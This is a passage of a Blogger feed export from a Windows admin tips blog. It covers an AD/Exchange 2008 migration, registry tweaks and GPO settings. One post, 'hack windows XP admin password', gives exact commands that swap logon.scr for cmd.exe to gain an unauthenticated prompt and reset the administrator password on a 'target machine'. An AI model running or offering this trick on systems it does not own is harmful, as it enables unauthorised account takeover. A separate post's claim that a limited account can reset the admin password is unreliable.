&gt;HKEY_Local_Machine\Systems\currentcontrolset\services\NTDS\Parameters&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Click on “Schema Version” it should be &lt;span style="color:red;"&gt;30 or 31.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpFirst" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Copy &lt;span style="color:red;"&gt;ADprep32.exe&lt;/span&gt; from windows 2008 server CD to Old server in C: drive.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Go to &gt; CMD &gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;# cd \adprep32 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;# adprep 32.exe /forestprep&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Do not close the cmd, as we need it in next Step&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt; &lt;/span&gt;Now Check the Schema Version&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Run &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; regedit&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;HKEY_Local_Machine\Systems\currentcontrolset\services\NTDS\Parameters&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Should be updated to &lt;span style="color:red;"&gt;41&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(**Check all other domain controllers for the same)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;d/ Prepare Domain and Group Policy Level &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Go to &gt; CMD &gt; cd \adprep32 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;# Adprep32 /domainprep&lt;span style=""&gt;  &lt;/span&gt;/gpprep&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpLast" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;e/ Install Windows Server 2003 Support Tools on Old Server :-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Open support tools command prompt&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; All programs &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Windows support tools&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Command prompt&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;# netdom query fsmo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Check all following 5 roles to make sure it is primary DC:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Infrastructure Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Naming Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;PDC Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;4.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;RID&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;5.&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;    &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Schema master&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;All 5 Roles should be with OLD server &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Summary: - In this part we have prepared our Current AD environment to Install First Windows server 2008. Now in next step we will Install Windows server 2008 and will promote this server as primary DC by transferring all 5 FSMO roles to the new server. Also we will prepare, install and configure our Domain Environment for the Exchange Standard Server 2007 SP1.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7640079176573049136?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7640079176573049136/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7640079176573049136&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7640079176573049136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7640079176573049136'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/03/upgrademigrationtransitioning.html' title='Upgrade/Migration/Transitioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part I'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6340807731093677688</id><published>2008-06-01T18:24:00.000+10:00</published><updated>2008-06-01T18:30:10.799+10:00</updated><title type='text'>Clear system page file at shutdown</title><content type='html'>Click on Start --&gt; Run --&gt; Wire on Open space "Regedit" without coates.&lt;br /&gt;New window will opens got to the below navigation.&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\ClearPageFileAtShutdownDouble click on it and give Value: 1 Click on ok।&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6340807731093677688?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/6340807731093677688/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=6340807731093677688&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6340807731093677688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6340807731093677688'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/06/clear-system-page-file-at-shutdown.html' title='Clear system page file at shutdown'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7857023337727971089</id><published>2008-06-01T18:20:00.000+10:00</published><updated>2008-06-01T18:23:51.053+10:00</updated><title type='text'>Adding Pop-Up Blocker Exceptions(Allow Pop-Up List) via GPO</title><content type='html'>To get this setup follow these steps:&lt;br /&gt;1.     Open your preferred GPO editor and create a new GPO.&lt;br /&gt;2.     Navigate to Computer Configuration &gt; Administrative Templates &gt; Windows Components &gt; Internet Explorer&lt;br /&gt;3.     Double click on the item named "Pop-Up Allow List"&lt;br /&gt;4.     Enable the GPO&lt;br /&gt;5.     Click "Show" to show a list of allowed sites&lt;br /&gt;6.     Click "Add" to add a new site to the list.&lt;br /&gt;7.     Accept all of your changes and apply the GPO. Remember when entering in allowed sites that only the domain name is allowed, so www.google.com will work, but not http://www.google.com. Wildcards are allowed as well, so *.google.com is also valid.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7857023337727971089?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/7857023337727971089/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=7857023337727971089&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7857023337727971089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7857023337727971089'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/06/adding-pop-up-blocker-exceptionsallow.html' title='Adding Pop-Up Blocker Exceptions(Allow Pop-Up List) via GPO'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4792290569433355933</id><published>2008-03-20T21:39:00.000+11:00</published><updated>2008-03-20T21:42:13.783+11:00</updated><title type='text'>Use photos in Windows XP’s 3D Flying Objects</title><content type='html'>&lt;span style="font-family:times new roman;"&gt;you can use a photo for the texture in the 3D Flying Objects screen saver. Here’s how:&lt;br /&gt;Locate the photo you want to use in this screen saver, load it into a graphics program, and save it as a BMP file। (BMP is the only file type the 3D Flying Objects screen saver will allow you to सेलेक्ट)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Right-click on the desktop, select Properties, select the Screen Saver tab, and select 3D Flying Objects from the Screen Saver drop-down list.&lt;br /&gt;Click the Settings button and select Textured Flag from the Style drop-down list.&lt;br /&gt;Click the Texture button and use the Choose Texture File dialog box to locate and select your photo.&lt;br /&gt;Crank up Resolution and Size sliders to the Max setting and click OK to close the 3D Flying Objects Setting dialog box.&lt;br /&gt;Click the Preview button to test your new screen saver, then click OK to enable it&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4792290569433355933?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4792290569433355933/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4792290569433355933&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4792290569433355933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4792290569433355933'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/03/use-photos-in-windows-xps-3d-flying.html' title='Use photos in Windows XP’s 3D Flying Objects'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-958154210056860954</id><published>2008-03-01T11:44:00.000+11:00</published><updated>2008-03-01T11:47:14.414+11:00</updated><title type='text'>Change OR Reset Admin Password by limited Account</title><content type='html'>Type the following command in run&lt;br /&gt;&lt;br /&gt;"compmgmt.msc"(don’t use quotes)&lt;br /&gt;&lt;br /&gt;then u will be opened with a window in that-&gt;&lt;br /&gt;Go to local users &amp;amp; groups-&gt;user&lt;br /&gt;Then u will be opened with different users in your system.&lt;br /&gt;Then on admin option right click it and select set password and set password. It will be change. now login with your new password........................&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-958154210056860954?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/958154210056860954/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=958154210056860954&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/958154210056860954'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/958154210056860954'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/02/change-or-reset-admin-password-by.html' title='Change OR Reset Admin Password by limited Account'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-216780607359874249</id><published>2008-03-01T11:40:00.000+11:00</published><updated>2008-03-01T11:43:55.545+11:00</updated><title type='text'>hack windows XP admin password</title><content type='html'>If you log into a limited account on your target machine :-&lt;br /&gt;open up a dos promptthen enter this set of commands Exactly:&lt;br /&gt;cd\ *drops to root&lt;br /&gt;cd\windows\system32 *directs to the system32 dir&lt;br /&gt;mkdir temphack *creates the folder temphack&lt;br /&gt;copy logon.scr temphack\logon.scr *backsup logon.scr&lt;br /&gt;copy cmd.exe temphack\cmd.exe *backsup cmd.exe&lt;br /&gt;del logon.scr *deletes original logon.scr&lt;br /&gt;rename cmd.exe logon.scr *renames cmd.exe to logon.scr&lt;br /&gt;exit *quits dos&lt;br /&gt;&lt;br /&gt;Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.Once this happens if you enter this command minus the quotes&lt;br /&gt;&lt;br /&gt;"net user &lt;admin&gt; password"&lt;br /&gt;&lt;br /&gt;If the Administrator Account is called abcd and you want the password 1234 enter this"net user abcd 1234"and this changes the password on abcd machine to 1234 and your in.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-216780607359874249?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/216780607359874249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=216780607359874249&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/216780607359874249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/216780607359874249'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/02/hack-windows-xp-admin-password.html' title='hack windows XP admin password'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4913482377188781178</id><published>2008-02-29T22:13:00.000+11:00</published><updated>2008-02-29T22:14:20.881+11:00</updated><title type='text'>HOW TO DISPLY PENTIUM 5 OR EVEN MORE IN XP</title><content type='html'>NOW U CAN ABLE TO SHOW PENTIUM 5 AND EVEN MORETYPE "REGEDIT" IN RUN BOX {START-&gt;RUN-&gt;TYPE REGEDIT}NOW CLICK INH-KEY-LOCAL-MACHIN . THEN ON HARDWARE. THEN ON DISCRIPTION.THEN ON SYSTEM,THEN ONCentralProcessor.THEN ON 0{H-KEY-LOCAL-MACHIN/HARDWARE/DISCRIPTION/SYSTEM/CentralProcessor/0}NOW U GET IN RIGHT PANE THE VALUE THAT IS"ProcessorNameString"DOUBLE CLICK ON THIS VALUEVALUE NAME AND VALUE DATA IS NOW IN FROUNT OF U NOW IN DATA COLOM U CAN EDIT IT RANDOMLY WHAT U WANT IN PLACE OF THATVALUEAND THEN PRESS OKNOW SEE SYSTEM PROPERTY JUST RIGHT CLICKING IN U ARE MY COMPUTER ICON OR SEE SYSTEM .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4913482377188781178?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4913482377188781178/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4913482377188781178&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4913482377188781178'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4913482377188781178'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/02/how-to-disply-pentium-5-or-even-more-in.html' title='HOW TO DISPLY PENTIUM 5 OR EVEN MORE IN XP'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-438583558166733732</id><published>2008-01-16T20:48:00.000+11:00</published><updated>2008-01-16T20:50:54.339+11:00</updated><title type='text'>Internet Explorer 8 aims for standard compliance</title><content type='html'>&lt;a title="Permanent Link: Internet Explorer 8 aims for standard compliance" href="http://blogs.techrepublic.com.com/tech-news/?p=1803" rel="bookmark"&gt;Internet Explorer 8 aims for standard compliance&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://blogs.techrepublic.com.com/tech-news/?p=1803"&gt;http://blogs.techrepublic.com.com/tech-news/?p=1803&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-438583558166733732?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/438583558166733732/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=438583558166733732&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/438583558166733732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/438583558166733732'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2008/01/internet-explorer-8-aims-for-standard.html' title='Internet Explorer 8 aims for standard compliance'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4868560716118846039</id><published>2008-01-16T20:41:00.000+11:00</published><updated>2008-01-16T20:48:21.518+11:00</updated><title type='text'>Restart Windows Server 2003 from the command line</title><content type='html'>&lt;p&gt;&lt;a title="Permanent Link: Restart Windows Server 2003 from the command line" href="http://blogs.techrepublic.com.com/datacenter/?p=245" rel="bookmark"&gt;&lt;strong&gt;&lt;span style="font-family:times new roman;font-size:130%;"&gt;Restart Windows Server 2003 from the command line&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;&lt;a href="http://blogs.techrepublic.com.com/datacenter/?p=245"&gt;http://blogs.techrepublic.com.com/datacenter/?p=245&lt;/a&gt;&lt;/p&gt;&lt;div 